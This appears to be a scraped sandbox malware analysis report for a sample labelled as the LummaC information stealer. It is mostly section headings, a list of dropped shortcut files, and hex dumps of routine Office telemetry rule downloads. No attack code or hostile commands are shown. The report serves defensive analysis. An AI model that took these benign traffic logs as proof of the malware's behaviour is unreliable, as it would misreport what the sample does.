DL="A" DCa="DC"

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:27 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:28 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:27 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020427Z-178bfbc474btrnf9hC1NYCb80g00000005k00000000016zc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:28 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:27 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:27 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 4a9b7938-301e-000c-7880-3d323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020427Z-174c587ffdfmlsmvhC1TEBvyks00000003x000000000d1dx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-24 02:04:28 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:29 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:29 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020429Z-174c587ffdf8fcgwhC1TEBnn7000000003yg00000000a790 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:29 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:29 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:30 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 30601852-401e-0047-7476-3b8597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020430Z-174c587ffdf8fcgwhC1TEBnn7000000003ug00000000rtdt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:30 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:29 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:30 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 8592a006-f01e-0085-6b6a-3c88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020430Z-174c587ffdftv9hphC1TEBm29w00000003u00000000005xq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:30 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:29 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:30 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: b54876a2-a01e-0070-6764-3b573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020430Z-178bfbc474bq2pr7hC1NYCkfgg00000005gg0000000057p8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:30 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:30 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:30 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: de6003cd-b01e-0098-493c-3ccead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020430Z-178bfbc474bscnbchC1NYCe7eg00000005b000000000m5s2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:30 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:31 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:32 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020432Z-15b8b599d88z9sc7hC1TEBkr4w00000003w000000000cya2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:32 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:32 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:32 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020432Z-174c587ffdfldtt2hC1TEBwv9c00000003h000000000n34x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-24 02:04:32 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-24 02:04:32 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-24 02:04:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 02:04:32 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: eb93f719-b01e-0098-406c-3dcead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241124T020432Z-15b8b599d889fz52hC1TEB59as00000003vg000000001n66 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-24 02:04:32 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />